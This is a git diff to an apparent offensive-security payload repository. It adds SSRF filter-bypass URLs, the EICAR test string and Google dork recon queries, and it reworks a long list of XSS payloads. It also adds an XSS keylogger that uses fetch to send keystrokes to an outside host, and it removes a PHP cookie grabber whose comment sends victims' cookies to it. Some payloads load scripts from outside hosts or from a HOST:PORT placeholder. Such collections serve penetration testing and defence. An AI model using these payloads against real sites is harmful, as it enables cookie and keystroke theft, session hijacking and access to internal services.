XSS Intruder + Eicar + SSRF http://0
@ -18,10 +18,11 @@ knockpy domain.com -w subdomains-top1mil-110000.txt
|
|||||||
* Using Google Dorks and Google Transparency Report
|
* Using Google Dorks and Google Transparency Report
|
||||||
```bash
|
```bash
|
||||||
site:*.domain.com -www
|
site:*.domain.com -www
|
||||||
site:http://domain.com filetype:pdf
|
site:domain.com filetype:pdf
|
||||||
site:http://domain.com inurl:&
|
site:domain.com inurl:'&'
|
||||||
site:http://domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin
|
site:domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin
|
||||||
site:http://domain.com ext:php,asp,aspx,jsp,jspa,txt,swf
|
site:domain.com ext:php,asp,aspx,jsp,jspa,txt,swf
|
||||||
|
site:*.*.domain.com
|
||||||
|
|
||||||
You need to include subdomains ;)
|
You need to include subdomains ;)
|
||||||
https://www.google.com/transparencyreport/https/ct/?hl=en-US#domain=[DOMAIN]g&incl_exp=true&incl_sub=true
|
https://www.google.com/transparencyreport/https/ct/?hl=en-US#domain=[DOMAIN]g&incl_exp=true&incl_sub=true
|
||||||
|
@ -28,7 +28,7 @@ Advanced exploit using type=url
|
|||||||
```
|
```
|
||||||
Change "type=file" to "type=url"
|
Change "type=file" to "type=url"
|
||||||
Paste URL in text field and hit enter
|
Paste URL in text field and hit enter
|
||||||
Using this vulnerability users can upload images from any image URL = trigger an SSRF
|
Using this vulnerability users can upload images from any image URL = trigger an SSRF
|
||||||
```
|
```
|
||||||
|
|
||||||
## Bypassing
|
## Bypassing
|
||||||
@ -58,5 +58,20 @@ localhost:+11211aaa
|
|||||||
localhost:00011211aaaa
|
localhost:00011211aaaa
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Bypass using rare address
|
||||||
|
```
|
||||||
|
http://0/
|
||||||
|
```
|
||||||
|
|
||||||
|
Bypass using tricks combination
|
||||||
|
```
|
||||||
|
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
|
||||||
|
urllib2 : 1.1.1.1
|
||||||
|
requests + browsers : 2.2.2.2
|
||||||
|
urllib : 3.3.3.3
|
||||||
|
```
|
||||||
|
|
||||||
## Thanks to
|
## Thanks to
|
||||||
* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
|
* [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
|
||||||
|
* [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
|
||||||
|
* [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
|
||||||
|
1
Upload insecure files/Eicar/eicar.com.txt
Normal file
@ -0,0 +1 @@
|
|||||||
|
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
|
@ -1,11 +0,0 @@
|
|||||||
<?php
|
|
||||||
// How to use it
|
|
||||||
# <script>document.location='http://localhost/XSS/grabber.php?c=' + document.cookie</script>
|
|
||||||
|
|
||||||
// Write the cookie in a file
|
|
||||||
$cookie = $_GET['c'];
|
|
||||||
$fp = fopen('cookies.txt', 'a+');
|
|
||||||
fwrite($fp, 'Cookie:' .$cookie.'\r\n');
|
|
||||||
fclose($fp);
|
|
||||||
|
|
||||||
?>
|
|
Before Width: | Height: | Size: 379 B After Width: | Height: | Size: 379 B |
Before Width: | Height: | Size: 12 KiB After Width: | Height: | Size: 12 KiB |
Before Width: | Height: | Size: 12 KiB After Width: | Height: | Size: 12 KiB |
@ -6,78 +6,78 @@
|
|||||||
'-alert(1)//
|
'-alert(1)//
|
||||||
\'-alert(1)//
|
\'-alert(1)//
|
||||||
</script><svg onload=alert(1)>
|
</script><svg onload=alert(1)>
|
||||||
<x contenteditable onblur=alert(1)>lose focus!
|
<x contenteditable onblur=alert(1)>lose focus!
|
||||||
<x onclick=alert(1)>click this!
|
<x onclick=alert(1)>click this!
|
||||||
<x oncopy=alert(1)>copy this!
|
<x oncopy=alert(1)>copy this!
|
||||||
<x oncontextmenu=alert(1)>right click this!
|
<x oncontextmenu=alert(1)>right click this!
|
||||||
<x oncut=alert(1)>copy this!
|
<x oncut=alert(1)>copy this!
|
||||||
<x ondblclick=alert(1)>double click this!
|
<x ondblclick=alert(1)>double click this!
|
||||||
<x ondrag=alert(1)>drag this!
|
<x ondrag=alert(1)>drag this!
|
||||||
<x contenteditable onfocus=alert(1)>focus this!
|
<x contenteditable onfocus=alert(1)>focus this!
|
||||||
<x contenteditable oninput=alert(1)>input here!
|
<x contenteditable oninput=alert(1)>input here!
|
||||||
<x contenteditable onkeydown=alert(1)>press any key!
|
<x contenteditable onkeydown=alert(1)>press any key!
|
||||||
<x contenteditable onkeypress=alert(1)>press any key!
|
<x contenteditable onkeypress=alert(1)>press any key!
|
||||||
<x contenteditable onkeyup=alert(1)>press any key!
|
<x contenteditable onkeyup=alert(1)>press any key!
|
||||||
<x onmousedown=alert(1)>click this!
|
<x onmousedown=alert(1)>click this!
|
||||||
<x onmousemove=alert(1)>hover this!
|
<x onmousemove=alert(1)>hover this!
|
||||||
<x onmouseout=alert(1)>hover this!
|
<x onmouseout=alert(1)>hover this!
|
||||||
<x onmouseover=alert(1)>hover this!
|
<x onmouseover=alert(1)>hover this!
|
||||||
<x onmouseup=alert(1)>click this!
|
<x onmouseup=alert(1)>click this!
|
||||||
<x contenteditable onpaste=alert(1)>paste here!
|
<x contenteditable onpaste=alert(1)>paste here!
|
||||||
<script>alert(1)//
|
<script>alert(1)//
|
||||||
<script>alert(1)<!–
|
<script>alert(1)<!–
|
||||||
<script src=//brutelogic.com.br/1.js>
|
<script src=//brutelogic.com.br/1.js>
|
||||||
<script src=//3334957647/1>
|
<script src=//3334957647/1>
|
||||||
%3Cx onxxx=alert(1)
|
%3Cx onxxx=alert(1)
|
||||||
<%78 onxxx=1
|
<%78 onxxx=1
|
||||||
<x %6Fnxxx=1
|
<x %6Fnxxx=1
|
||||||
<x o%6Exxx=1
|
<x o%6Exxx=1
|
||||||
<x on%78xx=1
|
<x on%78xx=1
|
||||||
<x onxxx%3D1
|
<x onxxx%3D1
|
||||||
<X onxxx=1
|
<X onxxx=1
|
||||||
<x OnXxx=1
|
<x OnXxx=1
|
||||||
<X OnXxx=1
|
<X OnXxx=1
|
||||||
<x onxxx=1 onxxx=1
|
<x onxxx=1 onxxx=1
|
||||||
<x/onxxx=1
|
<x/onxxx=1
|
||||||
<x%09onxxx=1
|
<x%09onxxx=1
|
||||||
<x%0Aonxxx=1
|
<x%0Aonxxx=1
|
||||||
<x%0Conxxx=1
|
<x%0Conxxx=1
|
||||||
<x%0Donxxx=1
|
<x%0Donxxx=1
|
||||||
<x%2Fonxxx=1
|
<x%2Fonxxx=1
|
||||||
<x 1='1'onxxx=1
|
<x 1='1'onxxx=1
|
||||||
<x 1="1"onxxx=1
|
<x 1="1"onxxx=1
|
||||||
<x </onxxx=1
|
<x </onxxx=1
|
||||||
<x 1=">" onxxx=1
|
<x 1=">" onxxx=1
|
||||||
<http://onxxx%3D1/
|
<http://onxxx%3D1/
|
||||||
<x onxxx=alert(1) 1='
|
<x onxxx=alert(1) 1='
|
||||||
<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>
|
<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)>
|
||||||
'onload=alert(1)><svg/1='
|
'onload=alert(1)><svg/1='
|
||||||
'>alert(1)</script><script/1='
|
'>alert(1)</script><script/1='
|
||||||
*/alert(1)</script><script>/*
|
*/alert(1)</script><script>/*
|
||||||
*/alert(1)">'onload="/*<svg/1='
|
*/alert(1)">'onload="/*<svg/1='
|
||||||
`-alert(1)">'onload="`<svg/1='
|
`-alert(1)">'onload="`<svg/1='
|
||||||
*/</script>'>alert(1)/*<script/1='
|
*/</script>'>alert(1)/*<script/1='
|
||||||
<script>alert(1)</script>
|
<script>alert(1)</script>
|
||||||
<script src=javascript:alert(1)>
|
<script src=javascript:alert(1)>
|
||||||
<iframe src=javascript:alert(1)>
|
<iframe src=javascript:alert(1)>
|
||||||
<embed src=javascript:alert(1)>
|
<embed src=javascript:alert(1)>
|
||||||
<a href=javascript:alert(1)>click
|
<a href=javascript:alert(1)>click
|
||||||
<math><brute href=javascript:alert(1)>click
|
<math><brute href=javascript:alert(1)>click
|
||||||
<form action=javascript:alert(1)><input type=submit>
|
<form action=javascript:alert(1)><input type=submit>
|
||||||
<isindex action=javascript:alert(1) type=submit value=click>
|
<isindex action=javascript:alert(1) type=submit value=click>
|
||||||
<form><button formaction=javascript:alert(1)>click
|
<form><button formaction=javascript:alert(1)>click
|
||||||
<form><input formaction=javascript:alert(1) type=submit value=click>
|
<form><input formaction=javascript:alert(1) type=submit value=click>
|
||||||
<form><input formaction=javascript:alert(1) type=image value=click>
|
<form><input formaction=javascript:alert(1) type=image value=click>
|
||||||
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
|
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
|
||||||
<isindex formaction=javascript:alert(1) type=submit value=click>
|
<isindex formaction=javascript:alert(1) type=submit value=click>
|
||||||
<object data=javascript:alert(1)>
|
<object data=javascript:alert(1)>
|
||||||
<iframe srcdoc=<svg/onload=alert(1)>>
|
<iframe srcdoc=<svg/onload=alert(1)>>
|
||||||
<svg><script xlink:href=data:,alert(1) />
|
<svg><script xlink:href=data:,alert(1) />
|
||||||
<math><brute xlink:href=javascript:alert(1)>click
|
<math><brute xlink:href=javascript:alert(1)>click
|
||||||
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
|
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>
|
||||||
<html ontouchstart=alert(1)>
|
<html ontouchstart=alert(1)>
|
||||||
<html ontouchend=alert(1)>
|
<html ontouchend=alert(1)>
|
||||||
<html ontouchmove=alert(1)>
|
<html ontouchmove=alert(1)>
|
||||||
<html ontouchcancel=alert(1)>
|
<html ontouchcancel=alert(1)>
|
||||||
<body onorientationchange=alert(1)>
|
<body onorientationchange=alert(1)>
|
||||||
"><img src=1 onerror=alert(1)>.gif
|
"><img src=1 onerror=alert(1)>.gif
|
||||||
@ -85,9 +85,9 @@
|
|||||||
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
|
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
|
||||||
<script src="data:,alert(1)//
|
<script src="data:,alert(1)//
|
||||||
"><script src=data:,alert(1)//
|
"><script src=data:,alert(1)//
|
||||||
<script src="//brutelogic.com.br/1.js#
|
<script src="//brutelogic.com.br/1.js#
|
||||||
"><script src=//brutelogic.com.br/1.js#
|
"><script src=//brutelogic.com.br/1.js#
|
||||||
<link rel=import href="data:text/html,<script>alert(1)</script>
|
<link rel=import href="data:text/html,<script>alert(1)</script>
|
||||||
"><link rel=import href=data:text/html,<script>alert(1)</script>
|
"><link rel=import href=data:text/html,<script>alert(1)</script>
|
||||||
<base href=//0>
|
<base href=//0>
|
||||||
<script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)
|
<script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1)
|
||||||
@ -97,9 +97,6 @@ GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;
|
|||||||
<body onhashchange=alert(1)><a href=#x>click this!#x
|
<body onhashchange=alert(1)><a href=#x>click this!#x
|
||||||
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
|
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
|
||||||
<body onscroll=alert(1)><br><br><br><br>
|
<body onscroll=alert(1)><br><br><br><br>
|
||||||
<br><br><br><br><br><br><br><br><br><br>
|
|
||||||
<br><br><br><br><br><br><br><br><br><br>
|
|
||||||
<br><br><br><br><br><br><x id=x>#x
|
|
||||||
<body onresize=alert(1)>press F12!
|
<body onresize=alert(1)>press F12!
|
||||||
<body onhelp=alert(1)>press F1! (MSIE)
|
<body onhelp=alert(1)>press F1! (MSIE)
|
||||||
<marquee onstart=alert(1)>
|
<marquee onstart=alert(1)>
|
Before Width: | Height: | Size: 4.1 KiB After Width: | Height: | Size: 3.9 KiB |
@ -1,4 +1,3 @@
|
|||||||
# credit to rsnake
|
|
||||||
<SCRIPT>alert('XSS');</SCRIPT>
|
<SCRIPT>alert('XSS');</SCRIPT>
|
||||||
'';!--"<XSS>=&{()}
|
'';!--"<XSS>=&{()}
|
||||||
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
@ -18,6 +18,11 @@ fclose($fp);
|
|||||||
?>
|
?>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Keylogger for XSS
|
||||||
|
```
|
||||||
|
<img src=x onerror='document.onkeypress=function(e){fetch("http://domain.com?k="+String.fromCharCode(e.which))},this.remove();'>
|
||||||
|
```
|
||||||
|
|
||||||
## XSS in HTML/Applications
|
## XSS in HTML/Applications
|
||||||
XSS Basic
|
XSS Basic
|
||||||
```
|
```
|
||||||
|